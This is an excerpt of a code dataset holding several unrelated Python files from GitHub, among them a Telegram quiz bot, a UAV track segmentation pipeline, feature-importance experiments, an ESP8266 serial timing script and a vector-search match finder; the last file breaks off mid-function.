aiogram.\")\r\n\r\n\r\n@dp.message_handler(text=\"test\")\r\nasync def echo(message: types.Message):\r\n await message.answer_poll(\r\n question=\"Mars IT schoolning nechta filiyali bor?\",\r\n options=[\"1\", '2', '3'],\r\n correct_option_id=2,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT schoolda BACK-351DA nechta o'quvchi bor?\",\r\n options=[\"10\", '6', '17'],\r\n correct_option_id=1,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT da nechta kurs bor?\",\r\n options=[\"bekent\", 'frontent', 'stater', 'Hammasi bor'],\r\n correct_option_id=3,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n ),\r\n await asyncio.sleep(10)\r\n await message.answer_poll(\r\n question=\"Mars IT da necta coinga keyboard olasiz?\",\r\n options=[\"150\", '350', '500'],\r\n correct_option_id=1,\r\n type=\"quiz\",\r\n is_anonymous=False,\r\n open_period=10\r\n )\r\n\r\n\r\n\r\n@dp.message_handler()\r\nasync def echo(message: types.Message):\r\n await message.answer(\"Any text\")\r\n\r\n\r\nif __name__ == '__main__':\r\n executor.start_polling(dp, skip_updates=True)","repo_name":"Muhammadali-01/HOTEL_PYTON_CODES","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20087334901","text":"################################\n# This script is the main script of the UAV Track Classification project.\n# 0. Include all requirements\n# 1. Configure the flags\n# 2. Configure the input and output paths\n# 3. 
Run the script\n# \n# @author: David Sanchez \n# @author: Daniel Amigo \n################################\n\n#############################################################\n# IMPORTS #\n#############################################################\nimport math\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split # To split the data into train and test\nfrom os.path import isfile, join # To use the data files\nimport os\nimport imblearn # To balance the data\nimport psutil # To copy files \nimport multiprocessing # for parallelization\nimport pathlib\nimport shutil\n##### Algorithms to import #####\nimport segmentationAlgorithms as segmentation # segmentationAlgorithms.py - To segment the data \n\n#############################################################\n# FLAGS #\n#############################################################\n#activate processes flags\nprocessResampling_Beforesegments = True # Resampling before segments extraction \nprocessResampling_Aftersegments = False # \nprocessSegmentation = \"SQUISHE\" # \ncompressionRate = 1/100 # \nminCompressionLen = 10 # \nparalelize = True # \nnumThreads = 16 # Number of threads to use\n# Output flags\ndebug = False\nsavePartialInputs = True\n\n#############################################################\n# PATHS #\n#############################################################\n#Input PATHS\ninputPath = os.path.join(pathlib.Path(__file__).parent.parent.absolute(), \"Data\" , \"Segmentation\",\"Input\") # PATH to the folder with input data\ntracksDir = \"SingleTrackFiles\" # PATH to the sub-folder with input tracks\ninstancesCSVFile = 'Dataset final.csv' # File with the list of instances to be processed\n#Output PATHS\noutputPath = os.path.join(pathlib.Path(__file__).parent.parent.absolute(), \"Data\" , \"Segmentation\") # PATH to the folder with output data\ndividedThreadsDir = \"DividedThreads\" # PATH to the folder to generate output data\nresamplingSegmentsDir = \"ResamplingSegmentOutput\" # PATH to the sub-folder with pre-processed inputs\nresamplingTracksDir = \"ResamplingTracksOutput\" # PATH to the sub-folder with pre-processed inputs\nsegmentationDir = \"SegmentationOutput\" # PATH to the sub-folder with pre-processed inputs\n\n#############################################################\n# FUNCTIONS #\n#############################################################\n# *****************************************************************************************\n# ** Load data stored in a csv file\n# ******* INPUT: CSV file path\n# ******* OUTPUT: Dataframe with the data\n# *****************************************************************************************\ndef loadDataCSV(CSVList):\n csv = pd.read_csv(CSVList,sep=',')\n if debug:\n print(\"trajectory loaded\")\n csv\n return csv\n\n#####################################\n# This function extracts the trajectory summary from the ulog file\ndef extractSegmentSummary(track=None, segmentStart=None, segmentEnd=None):\n segmentStart = int(segmentStart)\n segmentEnd = int(segmentEnd)\n \n # initialize variables to store the summary\n # calculate duration in seconds\n duration = (track.timestamp[segmentEnd] - track.timestamp[segmentStart]) / 1000000 \n numPoints = segmentEnd - segmentStart\n distanceXY_sum = 0\n distanceZ_sum = 0\n speedXY_sum = 0\n speedZ_sum = 0\n\n # iterate over all data\n for i in range(segmentStart, segmentEnd):\n if i != 0:\n distanceXY_sum += math.sqrt((track.x[i] - track.x[i-1])**2 + (track.y[i] - track.y[i-1])**2)\n 
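 # Horizontal step length is the Euclidean (planar) distance between\n # consecutive fixes, sqrt(dx**2 + dy**2); the vertical component is\n # accumulated separately below so the XY and Z statistics stay independent.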
distanceZ_sum += abs(track.z[i] - track.z[i-1])\n speedXY_sum += math.sqrt((track.x[i] - track.x[i-1])**2 + (track.y[i] - track.y[i-1])**2) / (track.timestamp[i] - track.timestamp[i-1])\n speedZ_sum += abs(track.z[i] - track.z[i-1]) / (track.timestamp[i] - track.timestamp[i-1])\n # Calculate speed average\n speedXY_sum = speedXY_sum / numPoints\n speedZ_sum = speedZ_sum / numPoints\n return duration, numPoints, distanceXY_sum, distanceZ_sum, speedXY_sum, speedZ_sum\n\n# *****************************************************************************************\n# Segment the tracks\n# ******* INPUT: tracksDir: path to the folder with the tracks\n# ******* INPUT: outputPath: path to the folder to store the segments and its summary\n# ******* INPUT: flag to indicate if segmentation can be applied\n# ******* INPUT: thread_id: thread number\n# ******* INPUT: tracks: list of tracks to be processed \n# ******* INPUT: models: drone model for each track\n# ******* OUTPUT: segmentAlgorithm: CSV file with the dataframe including the segments extracted from the tracks\n# *****************************************************************************************\ndef segmentationProcess(tracksDir, outputPath, thread_id, tracks, models, segmentAlgorithm=\"SQUISHE\", debug=False):\n # Remove output folder if exists and create it again\n #if os.path.exists(outputPath):\n # shutil.rmtree(outputPath) \n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n\n tracks=tracks.reset_index(drop=True)\n models=models.reset_index(drop=True)\n if debug:\n print(\"thread_id\")\n print(thread_id)\n df_segments = pd.DataFrame(\n columns=[\n 'UAV_Airframe',\n 'track_id',\n 'segmentStart',\n 'segmentEnd',\n 'seg_id',\n 'num_segments',\n 'duration',\n 'numPoints',\n 'distanceXY',\n 'distanceZ',\n 'speedXY',\n 'speedZ'\n ]\n ) \n\n # for each track in x_train and model in y_train\n if debug:\n print(tracks)\n for i in range(len(tracks)): # for each track\n try:\n currentDroneModel = models[i] # Get drone model name\n trackFile = tracks[i]+\".csv\"\n trackID = tracks[i]\n except:\n print(f\"Error reading file number {i} of {len(tracks)}\")\n\n # Print the percentage of tracks processed each 10 tracks\n if i%10==0:\n print(\"Thread \"+str(thread_id)+\" has processed \"+str(i)+\" tracks of \"+str(len(tracks))+\" (\"+str(round(i/len(tracks)*100,2))+\"%)\")\n\n pathCSVSegments = os.path.join(outputPath, f\"segments_{thread_id}.csv\")\n\n try:\n # Read file\n trackPathFile = join(tracksDir,trackFile)\n if isfile(trackPathFile):\n df = pd.read_csv(trackPathFile,sep=',') \n \n # Select segmentation algorithm\n if segmentAlgorithm==\"SQUISHE\":\n indexList=segmentation.SQUISHE(df, compressionRate, minCompressionLen,thread_id,debug) #create segments\n else:\n pass # TO EXPAND IN THE FUTURE\n \n # On each segment, store on a CSV file its data\n segmentID=0\n for i in range(len(indexList)-1):\n segmentStart = indexList.iloc[i]['index']\n segmentEnd = indexList.iloc[i+1]['index']\n duration, numPoints, distanceXY, distanceZ, speedXY, speedZ = \\\n extractSegmentSummary(track=df, segmentStart=segmentStart, segmentEnd=segmentEnd)\n\n # Create a new dataframe with the segment data\n new_segment = pd.DataFrame(\n columns=[\n 'UAV_Airframe',\n 'track_id',\n 'segmentStart',\n 'segmentEnd',\n 'seg_id',\n 'num_segments',\n 'duration',\n 'numPoints',\n 'distanceXY',\n 'distanceZ',\n 'speedXY',\n 'speedZ'\n ]\n )\n new_segment.at[0,'UAV_Airframe'] = currentDroneModel\n new_segment.at[0,'track_id'] = trackID\n 
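 # `.at[row, col]` is pandas' fast label-based scalar accessor, so each\n # field of the one-row summary frame is written as a single cell.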
 new_segment.at[0,'segmentStart'] = segmentStart\n new_segment.at[0,'segmentEnd'] = segmentEnd\n new_segment.at[0,'seg_id'] = i\n new_segment.at[0,'num_segments'] = len(indexList)-1\n new_segment.at[0,'duration'] = duration \n new_segment.at[0,'numPoints'] = numPoints\n new_segment.at[0,'distanceXY'] = distanceXY\n new_segment.at[0,'distanceZ'] = distanceZ\n new_segment.at[0,'speedXY'] = speedXY\n new_segment.at[0,'speedZ'] = speedZ\n \n segmentID=segmentID+1\n\n # Add the new segment to the list of segments\n df_segments=pd.concat([df_segments, new_segment], ignore_index=True)\n\n # Save the new segment on the file of this thread (overwrite all the time)\n df_segments.to_csv(pathCSVSegments, index=False)\n\n except Exception as err:\n print(f\"Error in thread {thread_id} while running iteration {i} of file {trackFile}\")\n print(err)\n \n # Final storing of the segments\n df_segments.to_csv(pathCSVSegments, index=False)\n\n\n#############################################################\n# MAIN #\n#############################################################\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='UAVClassifier')\n parser.add_argument('--useFlags', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Debug', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Resampling', type=str, default=\"No\", help='Before/After/No')\n parser.add_argument('--Segmentation', type=str, default='SQUISHE', help='Desired algorithm SQUISHE')\n parser.add_argument('--CRate', type=str, default=\"50\", help='Int with the desired percentage of selected points')\n parser.add_argument('--MinPoints', type=int, default=10, help='Int with the desired minimum number of points')\n parser.add_argument('--Parallel', type=str, default=\"No\", help='Yes/No')\n parser.add_argument('--Threads', type=int, default=4, help='Int with the desired number of threads, -1 to auto calculate')\n parser.add_argument('--partialInputs', type=str, default=\"Yes\", help='Yes/No')\n args = parser.parse_args()\n\n # Algorithm configuration\n print(\"Using arguments\")\n if args.Debug == \"Yes\":\n debug = True\n else:\n debug = False\n if args.Resampling == \"Before\":\n processResampling_Beforesegments = True\n processResampling_Aftersegments = False\n elif args.Resampling == \"After\":\n processResampling_Beforesegments = False\n processResampling_Aftersegments = True\n else:\n processResampling_Beforesegments = False\n processResampling_Aftersegments = False\n processSegmentation= args.Segmentation \n if args.Parallel == \"Yes\":\n paralelize = True\n numThreads = 16 # Number of threads to use\n else:\n paralelize = False\n # Output flags\n if args.partialInputs == \"Yes\": savePartialInputs=True\n else: savePartialInputs=False\n \n ### Execute process\n # Read input data\n if debug:\n print(\"DEBUG: Loading data...\")\n \n # Read CSV\n pathsCSV = join(inputPath,instancesCSVFile)\n instancesCSV = loadDataCSV(pathsCSV)\n\n # Split data from class\n X = instancesCSV['ULG']\n y = instancesCSV['General']\n \n # parallelize execution\n if paralelize:\n if numThreads<1:\n numThreads = psutil.cpu_count() \n numFiles = len(X) # Number of files to process\n numFilesPerThread = int(numFiles/numThreads) # Number of files to process per thread\n print(\"Number of files to process: \", numFiles)\n print(\"Number of files per thread: \", numFilesPerThread)\n\n threads = []\n for i in range(numThreads):\n # get files to process in this thread\n if i == numThreads-1: \n filesToProcess = 
X[i*numFilesPerThread:] # last thread processes the remaining files\n associatedModels = y[i*numFilesPerThread:]\n else: \n filesToProcess = X[i*numFilesPerThread:(i+1)*numFilesPerThread] # other threads process the files assigned to them\n associatedModels = y[i*numFilesPerThread:(i+1)*numFilesPerThread]\n # Create the thread\n tracksDirPath = join(inputPath,tracksDir)\n outputPathPath = join(outputPath,dividedThreadsDir)\n t = multiprocessing.Process(target=segmentationProcess, args=(tracksDirPath, outputPathPath, i, filesToProcess, associatedModels, processSegmentation))\n threads.append(t)\n t.start()\n # Wait for all threads to finish\n for t in threads:\n t.join()\n\n # Merge the results\n segmentsList = pd.DataFrame()\n for i in range(numThreads):\n filename = os.path.join(outputPath, dividedThreadsDir, f\"segments_{i}.csv\")\n # read the CSV with Pandas\n df = pd.read_csv(filename, header=0)\n segmentsList = pd.concat([segmentsList, df], axis=0)\n if i == 0:\n # set header to CombinedDF\n segmentsList.columns = df.columns\n # Remove the individual files\n os.remove(filename)\n\n # Save the combined dataframe\n csvFile=join(outputPath, segmentationDir, \"segmentsCSVList.csv\")\n if savePartialInputs: segmentsList.to_csv(csvFile,index=False)\n\n # Single thread execution\n else:\n tracksDirPath = join(inputPath, tracksDir)\n outputPathPath = join(outputPath, segmentationDir)\n segmentsList = segmentationProcess(tracksDir=tracksDirPath, outputPath=outputPathPath, thread_id=0, tracks=X, models=y,\n segmentAlgorithm=processSegmentation, debug=debug)\n \n # Save the combined dataframe\n if savePartialInputs:\n filename = os.path.join(outputPath,segmentationDir, f\"segments_0.csv\")\n # read the CSV with Pandas\n segmentsList = pd.read_csv(filename, header=0)\n os.remove(filename)\n segmentsList.to_csv(join(outputPath,segmentationDir,\"segmentsCSVList.csv\"), index=False)\n\n # Save the combined dataframe\n","repo_name":"DavidSanpedrochez/UAVTrackClassification","sub_path":"2. 
data preparation/mainSegmentation.py","file_name":"mainSegmentation.py","file_ext":"py","file_size_in_byte":15680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73213679913","text":"def to_jaden_case(x):\n x = list(x)\n x[0] = x[0].upper()\n for j in range(1, len(x)):\n x[j] = x[j].lower()\n\n for i in range(len(x) - 1):\n if x[i] == ' ':\n x[i + 1] = x[i + 1].upper()\n\n x = ''.join(x)\n\n return x\n\n\nprint(to_jaden_case(\"How can mirrors be real if our eyes aren't real\"))\n","repo_name":"DaveAigbe/Challenges","sub_path":"CodeWars/CW - Jaden Casing Strings.py","file_name":"CW - Jaden Casing Strings.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28103402907","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport pandas as pd\nimport numpy as np\nfrom statsmodels.tools import categorical\n\n# https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.ExtraTreesClassifier.html\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nfrom sklearn.feature_selection import RFE, RFECV\n\n\ndef _time_analyze_(func):\n from time import perf_counter # time.clock was removed in Python 3.8\n exec_times = 1\n\n def callf(*args, **kwargs):\n start = perf_counter()\n for _ in range(exec_times):\n r = func(*args, **kwargs)\n finish = perf_counter()\n print(\"{:<20}{:10.6} s\".format(func.__name__ + \":\", finish - start))\n return r\n return callf\n\n\nbatch_size = 10\n\ntrain_data_dir = '~/Downloads/new_ele_power_cur_vol_weather.load.Three.bias.csv'\nreader = pd.read_csv(train_data_dir, chunksize=1000,\n dtype={'STAT_DATE': np.str})\n\n# print('dataset.shape: ', dataset.shape)\n\n# features = dataset[dataset.columns.values.tolist()[:-1]]\n# label = dataset['is_bias']\n\n\n# @_time_analyze_\n# def Normal():\n# clf_p = RandomForestClassifier(\n# warm_start=True, oob_score=True)\n# # clf_p = ExtraTreesClassifier(warm_start=True, n_estimators=1)\n# clf_p.fit(features, label)\n# # print(clf_p.oob_score_)\n# print(clf_p.feature_importances_)\n# print(np.sum(clf_p.feature_importances_))\n\n\ndef getTrainData(batch_size):\n try:\n data_batch = reader.get_chunk(batch_size)\n return data_batch[data_batch.columns.values.tolist()[:-1]], data_batch['is_bias']\n except Exception as e:\n print(e)\n return None, None\n\n\n@_time_analyze_\ndef RandomForestWarmStart():\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n # clf_p = ExtraTreesClassifier(warm_start=True, n_estimators=1)\n for data_batch in reader:\n f_batch = data_batch['STAT_DATE']\n # f_batch = categorical(f_batch\n # f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n clf_p.fit(f_batch, l_batch)\n # print(clf_p.estimators_)\n # print(clf_p)\n clf_p.n_estimators += 1\n # break\n # print(clf_p.oob_score_)
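 # With warm_start=True, each fit() call keeps the trees grown so far and\n # only adds enough new ones to reach the current n_estimators, so the\n # forest gains one tree per streamed chunk instead of being refit from\n # scratch each time.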
 print(clf_p.feature_importances_)\n print(np.sum(clf_p.feature_importances_))\n\n\n# Takes a long time to run\n@_time_analyze_\ndef ExtraTreesWarmStart():\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = ExtraTreesClassifier(\n warm_start=True, n_estimators=1, bootstrap=True)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n clf_p.fit(f_batch, l_batch)\n clf_p.n_estimators += 1\n # print(clf_p.oob_score_)\n print(clf_p.feature_importances_)\n print(np.sum(clf_p.feature_importances_))\n\n\n@_time_analyze_\ndef RFE_WarmStart():\n\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n selector = RFE(estimator=clf_p, n_features_to_select=1)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n result = selector.fit(f_batch, l_batch)\n selector.estimator.n_estimators += 1\n # print(clf_p.feature_importances_)\n # result = selector.fit(features, label)\n # print(selector.estimator.oob_score_)\n # print(selector.estimator.feature_importances_)\n print(result.ranking_)\n\n\n@_time_analyze_\ndef RFECV_WarmStart():\n\n # clf_p = RandomForestClassifier(warm_start=True, n_estimators=1)\n clf_p = RandomForestClassifier(\n warm_start=True, n_estimators=1)\n selector = RFECV(estimator=clf_p)\n for data_batch in reader:\n # print(\"in partial fit\")\n # data_batch = dataset[batch:batch+1000]\n f_batch = data_batch[data_batch.columns.values.tolist()[:-1]]\n l_batch = data_batch['is_bias']\n result = selector.fit(f_batch, l_batch)\n selector.estimator.n_estimators += 1\n # print(clf_p.feature_importances_)\n # result = selector.fit(features, label)\n # print(selector.estimator.oob_score_)\n # print(selector.estimator.feature_importances_)\n print(result.ranking_)\n print(result.grid_scores_)\n print(np.sum(result.grid_scores_))\n\n\ndef Preview():\n # ds =\n for data_batch in reader:\n # print(data_batch.shape)\n print(data_batch.head(3))\n print(data_batch.ix[0:3, 0])\n print(data_batch.ix[0].dtype)\n print(data_batch['is_bias'].dtype)\n break\n pass\n\n\nif __name__ == '__main__':\n # Normal()\n # RandomForestWarmStart()\n # ExtraTreesWarmStart()\n # RFE_WarmStart()\n # RFECV_WarmStart()\n Preview()\n","repo_name":"oushu1zhangxiangxuan1/feature-engineering","sub_path":"feature-importance/warm_start_bigdata.py","file_name":"warm_start_bigdata.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71040576873","text":"import os\nfrom pprint import pprint\nimport json\n\nimport numpy as np # needed for np.isnan below; this import was missing in the original\nfrom pandas import read_csv\n\nfrom state_county_names_codes import state_fips_code, state_county_code, county_acres\n\n\ndef get_county_landcover(nass, landcover_meta=None):\n state_codes = state_fips_code()\n df = read_csv(nass, index_col='GEOID')\n dct = {}\n for s, c in state_codes.items():\n if s not in state_county_code().keys():\n continue\n for k, v in state_county_code()[s].items():\n geoid = v['GEOID']\n tot_acres = county_acres()[geoid]\n water = tot_acres['water']\n land = tot_acres['land']\n total = land + water\n if total == 0:\n continue # skip counties with no reported area to avoid dividing by zero below\n try:\n irr_area = df.loc[int(geoid)]['IRR_2017']\n dry_area = df.loc[int(geoid)]['CROP_2017'] - irr_area\n irr_ratio = irr_area / total\n dry_ratio = dry_area / total\n uncult_ratio = (land - irr_area - dry_area) / total\n water_ratio = water / total\n d = {'dryland': dry_ratio, 'irrigated': irr_ratio, 'uncultivated': uncult_ratio,\n 'water': water_ratio}\n if any([np.isnan(x) for x in [dry_ratio, irr_ratio, uncult_ratio, water_ratio]]):\n dct[geoid] = {'cover': 'unknown'}\n else:\n dct[geoid] = d\n except KeyError:\n dct[geoid] = {'cover': 'unknown'}\n if landcover_meta:\n with open(landcover_meta, 'w') as fp:\n fp.write(json.dumps(dct, indent=4, sort_keys=True))\n return 
None\n pprint(dct)\n\n\nif __name__ == '__main__':\n pass\n# ========================= EOF ====================================================================\n","repo_name":"dgketchum/IrrMapperHumid","sub_path":"mapco/landcover.py","file_name":"landcover.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69930088552","text":"import serial\nimport csv\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pylab as plt\nimport re\nfrom tqdm import tqdm\n\nclass ESPSerial():\n def __init__(self, port):\n \"\"\"Construtor da classe ESP_Serial\"\"\"\n self.port = port\n self._open_serial()\n \n def _open_serial(self):\n \"\"\"Abre a porta serial\"\"\"\n self.serial = serial.Serial(self.port, 9600)\n \n def _close_serial(self):\n \"\"\"Fecha a porta serial\"\"\"\n self.serial.close()\n \n def aguardar_substring(self, substring):\n while True:\n line = str(self.serial.readline())\n # print(line)\n if substring in line:\n # print(f'Achei {substring}')\n return line\n else:\n # print(f'Não achei {substring}')\n continue\n \n def run_experiment(self):\n \"\"\"Executa o experimento e retorna os tempo de transferência\n return [int]\n para cada tamanho é feito 3 envios\n \"\"\"\n\n # tamanho dos arquivos: começa em 128 e vai de 128 em 128 até 10240\n sizes = [i for i in range(128, 10241, 128)]\n\n # data: {size: [time1, time2, time3]}\n # exemplo: {128: [1,2,3], 256: [4,5,6]}\n data = {}\n print(sizes)\n\n try:\n self.aguardar_substring(\"CONNECTED\")\n time.sleep(2)\n for size in tqdm(sizes):\n times = []\n for _ in range(3): # Faz 3 envios para cada tamanho de arquivo\n # Envia o tamanho do arquivo via serial para o ESP \n # self.aguardar_substring(\"FILE SIZE\")\n self.serial.write(f\"{size}\\n\".encode())\n \n # Aguarda um pouco para garantir que o ESP tenha tempo para processar a entrada\n time.sleep(2)\n \n # fica lendo linhas ate uma delas conter a palavra SUCCESS\n line = self.aguardar_substring(\"SUCCESS\")\n \n # Procura pelo tempo de transferência na linha lida\n time_match = re.search(r'Duration:(\\d+) ms', line)\n if time_match:\n times.append(int(time_match.group(1)))\n # print(f\"O tempo foi de: {time_match.group(1)}\")\n else:\n print(\"n achei o tempo\")\n time.sleep(2) \n \n data[size] = times\n # print(data)\n\n except Exception as e:\n print(f\"Ocorreu um erro durante o experimento: {e}\")\n return None\n\n return data\n\n\nif (__name__ == '__main__'):\n # Exemplo de uso\n esp_serial = ESPSerial('COM3') # Substitua 'COM3' pela porta serial do seu ESP8266\n data = esp_serial.run_experiment()\n esp_serial._close_serial()\n\n if data is not None:\n print(data)\n else:\n print(\"Experimento não foi concluído com sucesso.\")\n\n# # Abre a porta serial\n# ser = serial.Serial(args.port, 9600)\n\n\n\n# for size in range(6912,7200,128):\n# # Pede ao usuário para inserir o tamanho do arquivo\n# # size = input(\"Digite o tamanho do arquivo que você deseja (em Bytes): \")\n \n# # if not size.isdigit():\n# # print(\"Digite um valor válido.\")\n# # continue\n\n# # Envia o tamanho do arquivo via serial para o ESP\n# size = str(size)\n# ser.write(size.encode())\n# ser.write(b'\\n') # Envia uma nova linha para indicar o final da entrada\n\n# # Aguarda um pouco para garantir que o ESP tenha tempo para processar a entrada\n# time.sleep(2)\n\n\n# # fica lendo a saida do serial\n# while(1):\n# line = str(ser.readline())\n# print(line)\n\n# # Procura pelo tempo de transferência na 
linha lida\n# time_match = re.search(r'(\\d+) ms', line)\n# if(time_match):\n# print(f\"O tempo foi de: {time_match}\")\n# break\n\n# if time_match:\n# time_value = time_match.group(1)\n\n# # Escreve os dados no arquivo CSV\n# df = pd.read_csv('data.csv', index_col=False)\n# tam_bytes = df['QTD_Bytes'].to_list()\n# tempo_ms = df['Tempo_ms'].to_list()\n# dist_m = df['Distancia_m'].to_list()\n# qtd_paredes = df['QTD_Paredes'].to_list()\n\n# tam_bytes.append(size)\n# tempo_ms.append(time_value)\n# dist_m.append(args.distance)\n# qtd_paredes.append(args.walls)\n\n# ndf = pd.DataFrame()\n# ndf['QTD_Bytes']= np.array(tam_bytes)\n# ndf['Tempo_ms'] = np.array(tempo_ms )\n# ndf['Distancia_m'] = np.array(dist_m )\n# ndf['QTD_Paredes'] = np.array(qtd_paredes )\n\n# ndf.to_csv('data.csv', index=False)\n# print(f\"Dados salvos: Tamanho do Arquivo = {size} bytes, Tempo de Transferência = {time_value} ms\")\n\n# df = pd.read_csv('data.csv', index_col=False)\n\n\n# plt.plot(df['QTD_Bytes'], df['Tempo_ms'])\n# plt.show()","repo_name":"TarefasUFSC/Analise-de-Transferencia-de-dados-com-ESP8266","sub_path":"script/EspSerial.py","file_name":"EspSerial.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21503020026","text":"import asyncio\nimport csv\nimport aiohttp\nfrom sqlalchemy.orm import sessionmaker\nfrom utilities.db_connection import *\nfrom utilities.models_sql import *\n\n# connect to db\ndb_engine = initiate_engine(connection_str)\nconnection = db_engine.connect()\n\n# create session\nSession = sessionmaker(bind=db_engine)\nsession = Session()\n# fetch cast\ncast = session.query(Netflix).with_entities(Netflix.cast).all()\n\nsession.close()\n\n# find the unique actor names\nactors = []\nfor row in cast:\n actors.append(row[0].split(\",\"))\nactors = [actor for sublist in actors for actor in sublist]\nunique_actors = list(set(actors))\n\n# Async API calls to retrieve the gender and write to csv.\nasync def main(batch):\n async with aiohttp.ClientSession() as session:\n tasks = []\n for name in batch:\n name_for_url = \"+\".join(name.strip().split(\" \"))\n task = asyncio.ensure_future(get_actor_gender(session, name_for_url, name))\n tasks.append(task)\n\n gender = await asyncio.gather(*tasks)\n\n with open(\"gender.csv\", \"a\") as f:\n writer = csv.writer(f)\n writer.writerows(gender)\n\n\nasync def get_actor_gender(session, name_for_url, name):\n url = (\n f\"https://innovaapi.aminer.cn/tools/v1/predict/gender?name=\"\n + name_for_url\n + \"&org=\"\n )\n try:\n async with session.get(url) as response:\n result_data = await response.json()\n if response.status != 200:\n return {\"error\": f\"server returned {response.status}\"}\n else:\n try:\n gender = result_data[\"data\"][\"Final\"].get(\"gender\")\n except (KeyError, TypeError):\n gender = \"Not Found\"\n result = [name, gender]\n return result\n except asyncio.TimeoutError:\n return {\"Error\": f\"timeout error on {url}\"}\n\n\n# Narrowing the parallel API calls down to 1000 per time, due to asyncio.TimeoutError.\nbatch_length = 1000\nsub_lists = [\n unique_actors[i : i + batch_length]\n for i in range(0, len(unique_actors), batch_length)\n]\n\nfor batch in sub_lists:\n asyncio.run(main(batch))\n","repo_name":"nickzafi/Data-Engineer-Task","sub_path":"utilities/adding_gender.py","file_name":"adding_gender.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"24816777048","text":"# find_matches.py\n\nimport common.disable_warnings\nimport common.configure_logging\n\nimport argparse\nimport glob\nimport h5py\nimport heapq\nimport itertools\nimport json\nimport logging\nimport numpy as np\nimport os\nimport sqlite3\n\nfrom openpyxl import Workbook\nfrom operator import itemgetter\nfrom tqdm import tqdm\n\nfrom common.spacy_model import load_default_model\nfrom documents.load import load_query_files\nfrom documents.store import TextStore\nfrom vectors.similarity import get_most_similar\nfrom vectors.store import VectorStore\n\n\ndef load_queries(query_dir):\n model = load_default_model()\n query_info = load_query_files(query_dir)\n strs, ids = zip(*query_info)\n strs = list(strs)\n\n # precompute a vector per query\n sents = model.pipe(strs, batch_size=100)\n vecs = np.array([s.vector / np.linalg.norm(s.vector) for s in sents])\n\n del model\n return strs, vecs, list(ids)\n\n\ndef search(query_vecs, corpus_dir, output_dir, n_best):\n h5_paths = sorted(glob.glob(os.path.join(corpus_dir, '*.h5')))\n\n n_queries = query_vecs.shape[0]\n matches = [[] for _ in range(n_queries)]\n sort_kwargs = {'key': itemgetter('score'), 'reverse': True}\n\n for h5_path in h5_paths:\n # in theory, we could parallelize searching across buckets, but np\n # multithreads under the covers, so we'd basically be stealing cores\n # for ourselves...\n base_path = os.path.splitext(h5_path)[0]\n filename = os.path.basename(base_path)\n logging.info('Searching {}...'.format(filename))\n\n sql_path = '{}.sqlite'.format(base_path)\n chkpt_path = os.path.join(output_dir,\n 'checkpoint-{}.npz'.format(filename))\n\n sub_matches = _match_bucket(query_vecs, h5_path, sql_path,\n chkpt_path, n_best)\n\n for q_idx, q_matches in enumerate(sub_matches):\n q_matches.sort(**sort_kwargs)\n existing = matches[q_idx]\n merged = heapq.merge(existing, q_matches, **sort_kwargs)\n matches[q_idx] = list(itertools.islice(merged, n_best))\n\n return matches\n\n\ndef _match_bucket(query_vecs, h5_path, sql_path, chkpt_path, n_best):\n sql_conn = None\n\n with h5py.File(h5_path, 'r') as h5f:\n vstore = VectorStore(h5f)\n scores, sent_coords = get_most_similar(vstore, query_vecs,\n chkpt_path, n_best)\n try:\n sql_conn = sqlite3.connect(sql_path)\n tstore = TextStore(sql_conn)\n\n logging.info('Updating found matches...')\n matches = _collate_matches(tstore, scores, sent_coords, n_best)\n\n finally:\n if sql_conn: sql_conn.close()\n\n return matches\n\n\ndef _collate_matches(tstore, scores, sent_coords, n_best):\n n_queries = scores.shape[1]\n\n all_matches = []\n with tqdm(total=n_best*n_queries) as pbar:\n # queries are by column, unfortunately\n for q_scores, q_coords in zip(scores.T, sent_coords.T):\n q_info = tstore.get_sent_info(q_coords)\n\n matches = []\n for s_score, s_info in zip(q_scores, q_info):\n s_info['score'] = str(s_score)\n matches.append(s_info)\n pbar.update()\n\n all_matches.append(matches)\n\n return all_matches\n\n\ndef write_json(json_path, queries, query_ids, 